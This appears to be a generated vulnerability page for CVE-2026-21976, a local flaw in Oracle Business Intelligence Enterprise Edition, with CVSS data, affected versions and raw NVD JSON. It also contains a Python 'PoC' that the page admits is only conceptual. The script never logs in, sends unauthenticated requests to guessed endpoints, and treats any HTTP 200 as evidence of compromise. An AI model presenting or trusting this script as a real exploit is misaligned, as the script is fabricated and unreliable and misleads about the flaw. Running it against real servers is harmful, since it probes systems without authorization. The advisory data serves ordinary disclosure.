Security Vulnerability Report
CVE-2026-21976 CVSS 7.1 HIGH

CVE-2026-21976

Published: 2026-01-20 22:16:01
Last Modified: 2026-01-29 14:46:41

Description

Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Oracle Analytics Cloud). Supported versions that are affected are 7.6.0.0.0 and 8.2.0.0.0. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Business Intelligence Enterprise Edition executes to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:business_intelligence:7.6.0.0.0:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:oracle:business_intelligence:8.2.0.0.0:*:*:*:enterprise:*:*:* - VULNERABLE
Oracle Business Intelligence Enterprise Edition 7.6.0.0.0
Oracle Business Intelligence Enterprise Edition 8.2.0.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-21976 PoC - Oracle Business Intelligence Enterprise Edition
# Note: This is a conceptual PoC based on vulnerability description
# Actual exploitation requires local access and low-privilege account

import requests
import sys
from urllib.parse import urljoin


def exploit_cve_2026_21976(target_url, username, password):
    """
    Conceptual exploit for CVE-2026-21976
    Target: Oracle Business Intelligence Enterprise Edition
    Attack Vector: Local access with low privilege account
    """
    print(f"[*] Targeting: {target_url}")
    print(f"[*] Using credentials: {username}/{password}")

    # Step 1: Authenticate with low-privilege account
    # (login_url is built but no login request is ever sent, so the
    # session below stays unauthenticated; username/password are only printed)
    session = requests.Session()
    login_url = urljoin(target_url, '/analytics/saw.dll')

    # Step 2: Identify vulnerable endpoint in Oracle Analytics Cloud
    # The vulnerability allows unauthorized data manipulation
    vulnerable_endpoints = [
        '/analytics/api/v1/odata/',
        '/analytics/saw.dll/metadata',
        '/analytics/api/v1/subjectArea'
    ]

    # Step 3: Exploit the vulnerability
    for endpoint in vulnerable_endpoints:
        try:
            # Craft malicious request to bypass access control
            exploit_url = urljoin(target_url, endpoint)
            headers = {
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
                'X-Requested-With': 'XMLHttpRequest'
            }
            # This demonstrates unauthorized access attempt
            response = session.get(exploit_url, headers=headers, timeout=10)
            print(f"[+] Request to {endpoint}: Status {response.status_code}")
            if response.status_code == 200:
                print(f"[!] Potential unauthorized access detected at {endpoint}")
                return True
        except requests.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {e}")
    # No endpoint answered 200 (or all requests failed)
    return False


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve_2026_21976_poc.py <target_url> <username> <password>")
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    print("CVE-2026-21976 - Oracle Business Intelligence Enterprise Edition Exploit")
    print("=" * 70)
    exploit_cve_2026_21976(target, user, pwd)

References

https://www.oracle.com/security-alerts/cpujan2026.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21976", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:16:00.850", "lastModified": "2026-01-29T14:46:40.963", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Oracle Analytics Cloud). Supported versions that are affected are 7.6.0.0.0 and 8.2.0.0.0. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Business Intelligence Enterprise Edition executes to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)."}, {"lang": "es", "value": "Vulnerabilidad en el producto Oracle Business Intelligence Enterprise Edition de Oracle Analytics (componente: Oracle Analytics Cloud). Versiones compatibles que están afectadas son 7.6.0.0.0 y 8.2.0.0.0. Vulnerabilidad fácilmente explotable permite a un atacante con pocos privilegios con inicio de sesión en la infraestructura donde se ejecuta Oracle Business Intelligence Enterprise Edition comprometer Oracle Business Intelligence Enterprise Edition. Ataques exitosos de esta vulnerabilidad pueden resultar en acceso no autorizado de creación, eliminación o modificación a datos críticos o a todos los datos accesibles de Oracle Business Intelligence Enterprise Edition, así como acceso no autorizado a datos críticos o acceso completo a todos los datos accesibles de Oracle Business Intelligence Enterprise Edition. Puntuación base CVSS 3.1 de 7.1 (Impactos en la Confidencialidad y la Integridad). Vector CVSS: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:business_intelligence:7.6.0.0.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "43D14BEA-91DC-43B8-B733-5B4DF06E9D0D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:business_intelligence:8.2.0.0.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "5F31EEDA-FA38-419C-8AF8-CAB10EA8432F"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}